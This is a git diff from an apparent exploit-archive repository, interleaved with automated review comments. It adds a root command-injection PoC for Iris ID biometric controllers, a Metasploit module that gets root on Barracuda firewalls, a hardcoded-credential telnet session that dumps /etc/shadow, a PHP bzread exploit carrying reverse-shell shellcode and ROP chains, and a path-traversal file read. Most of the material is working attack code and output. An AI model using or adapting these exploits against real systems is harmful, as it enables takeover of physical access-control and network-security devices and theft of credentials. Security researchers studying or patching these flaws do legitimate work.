+------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidIsFileSelect" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidUseAsProxCard" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidVerForPHP" + +1.00.08"> +------WebKitFormBoundaryzczxmPRCR0fYr2SO-- + + + +CSRF PoC: +--------- + + + +
+ + + + + + + + + + + + + +
+
+
diff --git a/platforms/cgi/webapps/40166.txt b/platforms/cgi/webapps/40166.txt
new file mode 100755
index 000000000..2f90151c4
--- /dev/null
+++ b/platforms/cgi/webapps/40166.txt
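Review bot: The XSS PoC as committed carries no payload: the two injected fields, `name="HidChannelID"` with value `2">` and `name="HidVerForPHP"` with value `1.00.08">`, stop at the attribute-closing quote with nothing after it, and the CSRF PoC section below its `---------` underline contains only blank lines, so neither proof-of-concept actually demonstrates the issues the description claims. Presumably the `<script>` tag and the auto-submitting HTML form were stripped when the file was imported or rendered, which should be confirmed against ZSL-2016-5345 before this lands. The request also carries `Content-Length: x`, so it cannot be replayed without editing. Since the companion ZSL-2016-5346 advisory shows `HidChannelID` on this same `SetSmarcardSettings.php` endpoint reaching `exec()` as root, the advisory would be more useful with one sentence stating that the reflected XSS is the lesser of the two issues on that parameter.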
@@ -0,0 +1,153 @@ + +Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution + + +Vendor: Iris ID, Inc. +Product web page: http://www.irisid.com + http://www.irisid.com/productssolutions/hardwareproducts/icu-7000-2/ + +Affected version: ICU Software: 1.00.08 + ICU OS: 1.3.8 + ICU File system: 1.3.8 + EIF Firmware [Channel 1]: 1.9 + EIF Firmware [Channel 2]: 1.9 + Iris TwoPi: 1.4.5 + +Summary: The ICU 7000-2 is an optional component used when the client requires +iris template data to be matched on the secure side of the door. When using ICU +no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal +operation can continue if the there is an interruption in communication with the +host computer. In such circumstances, the ICU retains the records of portal activity, +then automatically updates the host upon resumption of host communication. Every +ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent +and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users. + +Desc: The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote +command execution vulnerability. The vulnerability exist due to several POST parameters +in the '/html/SetSmarcardSettings.php' script not being sanitized when using the exec() +PHP function while updating the Smart Card Settings on the affected device. Calling the +'$CommandForExe' variable which is set to call the '/cgi-bin/setsmartcard' CGI binary +with the affected parameters as arguments allows the attacker to execute arbitrary system +commands as the root user and bypass the biometric access control in place. + +===================================================================================== + +/html/SetSmarCardSettings.php: +------------------------------ + +53: +61: "; +63: echo "" +64: ?> +81: Smart Card Settings +88: +97: File availabe is: "; +101: //echo $FileAvaToUpload; +102: //echo "
"; +104: $BookVal = $_POST['cmbBook']; +105: //echo "
BookVal is "; +106: //echo $BookVal; +108: //echo "
Channel value is "; +109: //echo $ChNo; +111: $OffSet = $_POST['txtOffSet']; +112: //echo "
Offset is "; +113: //echo $OffSet; +115: $DataFormat = $_POST['DataFormat']; +117: //echo "
DataFormat is "; +118: //echo $DataFormat; +120: $EncryptAlg = $_POST['EncryAlg']; +122: if(0 == $DataFormat ) +123: $EncryptAlg = 4; +125: //echo "
Encryption Algarithm is "; +126: //echo $EncryptAlg; +128: $UseAsProxyCard = $_POST['chkUseAsProxCard']; +129: if( "" == $UseAsProxyCard ) +130: $UseAsProxyCard = "0"; +132: //echo "
Use as ProxyCard is "; +133: //echo $UseAsProxyCard; +135: $target_dir = "/tmp/temp_SmartCardKey"; +137: //$target_dir = $target_dir . basename( $_FILES["file1"]["name"]); +139: if(1 == $FileAvaToUpload ) { +140: if (move_uploaded_file($_FILES["file1"]["tmp_name"], $target_dir)) { +141: //echo "The file ". basename( $_FILES["file1"]["name"]). " has been uploaded."; +142: } else { +143: //echo "Sorry, there was an error uploading your file."; +144: } +145: } +147: $out = null; +148: $rc= 0; +149: $CommandForExe = "../cgi-bin/setsmartcard $ChNo $BookVal $OffSet $DataFormat $EncryptAlg $UseAsProxyCard $FileAvaToUpload"; +150: //$CommandForExe = "../cgi-bin/setsmartcard 1 0 10 1 1 0"; +151: echo exec($CommandForExe, $out, $rc); +153: //print_r( $out); +154: //echo 'rc = '.$rc."\n"; +156: //echo "After calling binary"; +158: //echo "Return value is: "; +159: //echo $rc; +160: //echo $out; +162: $sICUVersion = $_POST['HidVerForPHP']; +163: ?> + +===================================================================================== + +Vulnerable parameters: DataFormat + EncryAlg + HidChannelID + HidIsFileSelect + cmbBook + txtOffSet + + +Tested on: GNU/Linux 3.0.51 (armv7l) + mylighttpd v1.0 + PHP/5.5.13 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5346 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php + + +06.05.2016 + +-- + + +Request (cmbBook=0|id #): +------------------------- + +[lqwrm@lalaland /]# curl -i -s -k -X 'POST' \ +-H 'User-Agent: joxypoxy/7.2.6' -H 'Content-Type: application/x-www-form-urlencoded' \ +--data-binary $'HidChannelID=2&HidcmbBook=0&cmbBook=0|id+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08\x0d\x0a' \ +'http://[TARGET]/html/SetSmarcardSettings.php' + + +Response: +--------- + +HTTP/1.1 200 OK +X-Powered-By: 
PHP/5.5.13
+Content-type: text/html
+Connection: close
+Date: Thu, 09 May 2016 14:40:39 GMT
+Server: mylighttpd v1.0
+Content-Length: 11660
+
+...
+
+uid=0(root) gid=0(root)
+
+...
+
diff --git a/platforms/linux/remote/40162.rb b/platforms/linux/remote/40162.rb
new file mode 100755
index 000000000..431fba7f2
--- /dev/null
+++ b/platforms/linux/remote/40162.rb
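Review bot: The "Vulnerable parameters" list is incomplete against the quoted source: line 128 reads `chkUseAsProxCard` straight from `$_POST`, lines 129-130 only substitute `"0"` for an empty value, and line 149 interpolates it unescaped into the `setsmartcard` command string that line 151 hands to `exec()`, so it is injectable exactly like `cmbBook`; conversely the assignments behind `HidChannelID`/`$ChNo` and `HidIsFileSelect`/`$FileAvaToUpload` fall in the garbled lines 97-108, so those two entries cannot be verified from the excerpt as shown. The advisory also offers no remediation; the minimal fix at line 149 is to reject any value that fails `ctype_digit()` or to wrap every argument, e.g. `$CommandForExe = "../cgi-bin/setsmartcard " . implode(" ", array_map("escapeshellarg", [$ChNo, $BookVal, $OffSet, $DataFormat, $EncryptAlg, $UseAsProxyCard, $FileAvaToUpload]));`. Lines 139-140 deserve a sentence of their own: when `$FileAvaToUpload` equals 1, the attacker-supplied `file1` upload is written to the fixed path `/tmp/temp_SmartCardKey` before the binary runs, which is an arbitrary file write in the same apparently unauthenticated script and is independent of the injection. The `Request (cmbBook=0|id #)` PoC is consistent with the code, since `|id+%23` decodes to `|id #` and the `#` comments out the remaining arguments.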
@@ -0,0 +1,297 @@ +# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2) +# Date: 07/25/16 +# Exploit Author: xort xort@blacksecurity.org +# Vendor Homepage: https://www.barracuda.com/ +# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall +# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07) +# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07) +# CVE : None. + +# This exploit combines 2 bugs to leverage root access +# Vuln 1: ondefined_view_template trigger - File upload vuln +# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data) + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004 + by exploiting a two vulnerabilities in the web administration interface. The first bug leverages a Arbitrary File + Upload vulnerability to create a malicious file containing shell commands before using a second bug meant to clean + up left-over core files on the device to execute them. By sending a specially crafted requests + it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces. 
+ }, + + 'Author' => + [ + 'xort', # vuln + metasploit module + ], + 'Version' => '$Revision: 2 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + } + ], + + ['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd" + } + ], + ], + + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('ET', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'Accept' => "application/json, text/javascript, */*; q=0.01", + 'Content-Type' => "application/x-www-form-urlencoded", + 'X-Requested-With' => "XMLHttpRequest" + }, + 'vars_post' => + { + + 'enc_key' => enc_key, + 'et' => et, + 'user' => "admin", # username, + 'password' => "admin", # password_clear, + 'enctype' => "none", + 'password_entry' => "", + 'login_page' => "1", + 'login_state' => "out", + 'real_user' => "", + 'locale' => "en_US", + 'form' => "f", + 'Submit' => "Sign in", + } + }, timeout) + + # get rid of first yank + password = 
res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + vprint_status( "Running Command...\n" ) + + # file to overwrite + cmd_file = "/home/product/code/config/corefile_list.txt" + + # file to replace + sudo_cmd_exec = target['SudoCmdExec'] + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + # random filename to dump too + 'tmp' HAS to be here. + b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + # decoder stubs - tells 'base64' command to decode and dump data to temp file + b64decode1 = "echo \"" + b64decode2 = "\" | base64 -d >" + b64dumpfile + + # base64 - encode with base64 so we can send special chars and multiple lines + cmd = Base64.strict_encode64(cmd) + + # Create injection string. + # a) package the base64 decoder with encoded bytes + # b) attach a chmod +x request to make the script created (b64dumpfile) executable + # c) execute decoded base64 dumpfile + + injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile + + exploitreq = [ + [ "auth_type","Local" ], + [ "et",et ], + [ "locale","en_US" ], + [ "password", password ], + [ "primary_tab", "BASIC" ], + [ "realm","" ], + [ "secondary_tab","reports" ], + [ "user", username ], + [ "timestamp", Time.now.to_i ], + + [ "upload_template_file_filename", "admin" ] + ] + + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + post_data = "" + + exploitreq.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + + # upload file + up_filename = cmd_file + post_data << 
"--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n" + post_data << ";#{injection_string};\r\n" + + # end data + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n" + post_data << "\r\n" + + post_data << "--#{boundary}--\r\n" # end boundary + + # upload file vuln + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'Accept-Language' => "en-US,en;q=0.5" + } + }) + + post_data = "" + + exploitreq.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + + # triger vuln + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n" + post_data << "\r\n" + + post_data << "--#{boundary}--\r\n" # end boundary + + # upload file vuln + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'Accept-Language' => "en-US,en;q=0.5" + } + }) + + + + end + + def run_script(username, password, et, cmds) + vprint_status( "running script...\n") + + + end + + def exploit + # timeout + timeout = 1550; + + user = "admin" + + # params + real_user = ""; + login_state = "out" + et = Time.now.to_i + locale = "en_US" + user = "admin" + password = "admin" + enctype = "MD5" + 
password_entry = "" + password_clear = "admin" + + + password_hash, et = do_login(user, password_clear, et) + vprint_status("new password: #{password_hash} et: #{et}\n") + + sleep(5) + + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + handler + end + + + end + +end diff --git a/platforms/linux/remote/40167.txt b/platforms/linux/remote/40167.txt new file mode 100755 index 000000000..ffc5ac505 --- /dev/null +++ b/platforms/linux/remote/40167.txt 
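Review bot: The info hash in `initialize` sets `'Privileged' => true` and then `'Privileged' => false` a few keys later; Ruby keeps the last duplicate key, so the module advertises an unprivileged session although its title, description and the `SudoCmdExec` targets all describe a root result — delete the second entry and keep `'Privileged' => true`. The `ET` option carries the copy-pasted description `'Device password'`; it is the `et` value that `do_login` extracts from the response, so `OptString.new('ET', [ false, 'Login et token (optional)', "" ])` would say what it actually is. In `do_login`, `res.body.split('\n')` uses a single-quoted `'\n'`, which in Ruby is a literal backslash followed by n rather than a newline, so the body is never split into lines and the following `grep` only works because the regex is applied to the whole body as one element — `res.body.lines` makes the intent explicit. `run_script` is an empty stub whose `cmds` argument is never used; it should be removed or marked with a `# TODO` so it is not mistaken for a working code path. The `'References'` entry `[ 'none', 'none' ]` is not a valid reference pair and should be dropped.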
@@ -0,0 +1,205 @@ + +Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access + + +Vendor: Iris ID, Inc. +Product web page: http://www.irisid.com + http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/ + http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/ + http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/ + http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/ + +Affected version: iCAM4000: + iCAM Software: 3.09.02 + iCAM File system: 1.3 + CMR Firmware: 5.5 and 3.8 + EIF Firmware: 9.5 and 8.0 + HID iClass Library: 2.01.05 + ImageData Library: 1.153 + Command Process: 1.02 + + iCAM7000: + iCAM Software: 8.01.07 + iCAM File system: 1.4.0 + EIF Firmware: 1.9 + HID iClass Library: 1.00.00 + ImageData Library: 01.01.32 + EyeSeek Library: 5.00 + Countermeasure Library: 3.00 + LensFinder Library: 5.00 + Tilt Assist Library: 4.00 + +Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered +by Iris ID provides fast, secure, and highly accurate, non-contact identification +by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy +integration with many Wiegand and network based access control, time and attendance, +visitor management and point of sale applications. + +The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess +4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust, +iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional +wall-mount is used. + +Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials. +When visiting the device interface with a browser on port 80, the application loads an applet +JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. 
In the +JAR file there is an account 'rou' with password 'iris4000' that has read and limited write +privileges on the affected node. An attacker can access the device using these credentials +starting a simple telnet session on port 23 gaining access to sensitive information and/or +FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content. + +===================================================================================== + +/html/ICAMClient.jar (ICAMClient.java): +--------------------------------------- + +97: param_host = getParameter("host"); +98: param_user = "rou";//getParameter("user"); +99: param_pass = "iris4000";//getParameter("pass"); // password +100: param_path = getParameter("path"); // path on the server + + +/etc/ftpd/ftpd.conf: +-------------------- + +69: # User list: +70: # Format: user= +71: # user name +72: # password or * for anonymous access +73: # (internally appended to serverroot) +74: # the user has access to the WHOLE SUBTREE, +75: # if the server has access to it +76: # maximal logins with this usertype +77: # D - download +78: # U - upload + making directories +79: # O - overwrite existing files +80: # M - allows multiple logins +81: # E - allows erase operations +82: # A - allows EVERYTHING(!) 
+101: +103: user=rou iris4000 / 5 A + +===================================================================================== + + +Tested on: GNU/Linux 2.4.19 (armv5tel) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5347 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php + + +06.05.2016 + +-- + + +telnet [IP] +iCAM4000 login: rou +Password: +[rou@iCAM4000 rou]# id +uid=500(rou) gid=500(rou) groups=500(rou) +[rou@iCAM4000 rou]# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin: +daemon:x:2:2:daemon:/sbin: +adm:x:3:4:adm:/var/adm: +lp:x:4:7:lp:/var/spool/lpd: +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail: +news:x:9:13:news:/var/spool/news: +uucp:x:10:14:uucp:/var/spool/uucp: +operator:x:11:0:operator:/root: +games:x:12:100:games:/usr/games: +gopher:x:13:30:gopher:/usr/lib/gopher-data: +ftp:x:14:50:FTP User:/home/ftp: +nobody:x:99:99:Nobody:/: +rou:x:500:500::/home/rou:/bin/bash +[rou@iCAM4000 rou]# cd /web +[rou@iCAM4000 /web]# ls -al +total 0 +drwxrwxr-x 1 rou rou 0 Jul 26 07:22 . +drwxr-xr-x 1 root root 0 Jan 1 1970 .. 
+drwxrwxr-x 1 rou rou 0 Jan 31 2013 cgi-bin +drwxrwxr-x 1 rou rou 0 Jan 31 2013 html +drwxrwxr-x 1 rou rou 0 Jan 31 2013 images +[rou@iCAM4000 /web]# cat /etc/shadow +root:{{REMOVED}} +bin:*:10897:0:99999:7::: +daemon:*:10897:0:99999:7::: +adm:*:10897:0:99999:7::: +lp:*:10897:0:99999:7::: +sync:*:10897:0:99999:7::: +shutdown:*:10897:0:99999:7::: +halt:*:10897:0:99999:7::: +mail:*:10897:0:99999:7::: +news:*:10897:0:99999:7::: +uucp:*:10897:0:99999:7::: +operator:*:10897:0:99999:7::: +games:*:10897:0:99999:7::: +gopher:*:10897:0:99999:7::: +ftp:*:10897:0:99999:7::: +nobody:*:10897:0:99999:7::: +rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7::: +[rou@iCAM4000 /web]# cat /etc/issue + +Iris@ID iCAM4000 Linux (experimental) +Kernel 2.4.19-rmk7-pxa1 on an armv5tel +[rou@iCAM4000 /web]# ls -al html/ +total 289 +drwxrwxr-x 1 rou rou 0 Jan 31 2013 . +drwxrwxr-x 1 rou rou 0 Jul 26 07:22 .. +-rw-rw-r-- 1 rou rou 4035 Jan 31 2013 DHCPSettings_reboot.htm +-rw-rw-r-- 1 rou rou 100614 Jan 10 2008 ICAMClient.jar +-rw-rw-r-- 1 rou rou 6376 Jan 31 2013 WiegandSettings.htm +-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 authentication.htm +-rw-rw-r-- 1 rou rou 6166 Jan 31 2013 changeusername.htm +-rw-rw-r-- 1 rou rou 4816 Jan 31 2013 displayconfigsettings.htm +-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 downloadauthentication.htm +-rw-rw-r-- 1 rou rou 4850 Jan 31 2013 downloadvoice_result.htm +-rw-rw-r-- 1 rou rou 3237 Jan 31 2013 error.htm +-rw-rw-r-- 1 rou rou 3234 Jan 31 2013 error_ip.htm +-rw-rw-r-- 1 rou rou 3248 Jan 31 2013 error_loginfailure.htm +-rw-rw-r-- 1 rou rou 3349 Jan 31 2013 error_usb_ip.htm +-rw-rw-r-- 1 rou rou 6128 Jan 31 2013 ftpupload.htm +-rw-rw-r-- 1 rou rou 5331 Jan 31 2013 iCAMConfig.htm +-rw-rw-r-- 1 rou rou 4890 Jan 31 2013 icamconfig_reboot.htm +-rw-rw-r-- 1 rou rou 5314 Jan 31 2013 index.htm +-rw-rw-r-- 1 rou rou 7290 Jan 31 2013 main.htm +-rw-rw-r-- 1 rou rou 3662 Jan 31 2013 reboot_result.htm +-rw-rw-r-- 1 rou rou 5782 Jan 31 2013 smartcardauthentication.htm 
+-rw-rw-r-- 1 rou rou 17783 Jan 31 2013 smartcardconfig.htm +-rw-rw-r-- 1 rou rou 4895 Jan 31 2013 smartcardconfig_reboot.htm +-rw-rw-r-- 1 rou rou 5809 Jan 31 2013 smartcardconfig_result.htm +-rw-rw-r-- 1 rou rou 3672 Jan 31 2013 systeminfo.htm +-rw-rw-r-- 1 rou rou 5870 Jan 31 2013 updateicamconfig.htm +-rw-rw-r-- 1 rou rou 4239 Jan 31 2013 updateicamconfig_result.htm +-rw-rw-r-- 1 rou rou 6612 Jan 31 2013 updatenetworksettings.htm +-rw-rw-r-- 1 rou rou 4651 Jan 31 2013 updatenetworksettings_result.htm +-rw-rw-r-- 1 rou rou 5014 Jan 31 2013 updatenetworksettings_state.htm +-rw-rw-r-- 1 rou rou 3985 Jan 31 2013 upload.htm +-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 uploadauthentication.htm +-rw-rw-r-- 1 rou rou 4737 Jan 31 2013 uploadiriscapture_result.htm +-rw-rw-r-- 1 rou rou 6028 Jan 31 2013 voicemessagedownload.htm +-rw-rw-r-- 1 rou rou 6299 Jan 31 2013 voicemessageupdate.htm +-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 wiegandauthentication.htm +-rw-rw-r-- 1 rou rou 4893 Jan 31 2013 wiegandconfig_reboot.htm +[rou@iCAM4000 /web]# echo $SHELL +/bin/bash +[rou@iCAM4000 /web]# echo pwn > test.write +[rou@iCAM4000 /web]# cat test.write +pwn +[rou@iCAM4000 /web]# rm -rf test.write +[rou@iCAM4000 /web]# cd /etc/ftpd +[rou@iCAM4000 ftpd]# pwd +/etc/ftpd +[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou +user=rou iris4000 / 5 A +[rou@iCAM4000 ftpd]# ^D +Connection to host lost. diff --git a/platforms/php/dos/40155.txt b/platforms/php/dos/40155.py similarity index 58% rename from platforms/php/dos/40155.txt rename to platforms/php/dos/40155.py index 64b634900..8b53ead49 100755 --- a/platforms/php/dos/40155.txt +++ b/platforms/php/dos/40155.py @@ -1,3 +1,4 @@ +''' PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in its `bzread()' function: 
@@ -321,4 +322,212 @@ _________ [3] [https://bugs.php.net/bug.php?id=72613] --- Hans Jerry Illikainen \ No newline at end of file +-- Hans Jerry Illikainen +''' +#!/usr/bin/env python +# +# PoC for CVE-2016-5399 targeting FreeBSD 10.3 x86-64 running php-fpm +# behind nginx. +# +# ,---- +# | $ nc -v -l 1.2.3.4 5555 & +# | Listening on [1.2.3.4] (family 0, port 5555) +# | +# | $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php +# | [*] sending archive to http://target/upload.php (0) +# | +# | Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479) +# | $ fg +# | id +# | uid=80(www) gid=80(www) groups=80(www) +# | +# | uname -imrsU +# | FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000 +# | +# | /usr/sbin/pkg query -g "=> %n-%v" php* +# | => php70-7.0.8 +# | => php70-bz2-7.0.8 +# | +# | cat upload.php +# | +# `---- +# +# - Hans Jerry Illikainen +# +import argparse +import socket +from struct import pack + +import requests +import bitstring + +# reverse shell from metasploit +shellcode = [ + "\x31\xc0\x83\xc0\x61\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f" + "\x05\x49\x89\xc4\x48\x89\xc7\x31\xc0\x83\xc0\x62\x48\x31\xf6" + "\x56\x48\xbe\x00\x02%(port)s%(ip)s\x56\x48\x89\xe6\x6a\x10" + "\x5a\x0f\x05\x4c\x89\xe7\x6a\x03\x5e\x48\xff\xce\x6a\x5a\x58" + "\x0f\x05\x75\xf6\x31\xc0\x83\xc0\x3b\xe8\x08\x00\x00\x00\x2f" + "\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52" + "\x57\x48\x89\xe6\x0f\x05" +] + +# we're bound by the MTF and can only reuse values on the stack +# between pos[0]..pos[255] +selectors = [ + # retaddr: + # 0x8009c9462: lea rsp,[rbp-0x20] + # 0x8009c9466: pop rbx + # 0x8009c9467: pop r12 + # 0x8009c9469: pop r14 + # 0x8009c946b: pop r15 + # 0x8009c946d: pop rbp + # 0x8009c946e: ret + # + # from /libexec/ld-elf.so.1 (bbdffba2dc3bb0b325c6eee9d6e5bd01141d97f3) + 9, 10, 11, 18, 1, 88, 31, 127, + + # rbp: + # 0x802974300 (close to the end of the stream) + 16, 17, 18, 29, 22, 152, 159, 25, + + # push it back + 17, 18, 19, 
20, 21, 22, 23, 24, + 25, 26, 27, 28, 29, 30, 31, 32, + 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, 52, 53, 54, 55, 56, + 57, 58, 59, 60, 61, 62 +] + +payload = [ + # addr + # + # 0x41c4c8: pop rdi + # 0x41c4c9: ret + pack("$fname"; + + +This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker. + +Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on. + + +Proof Of Concept +================ + +PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +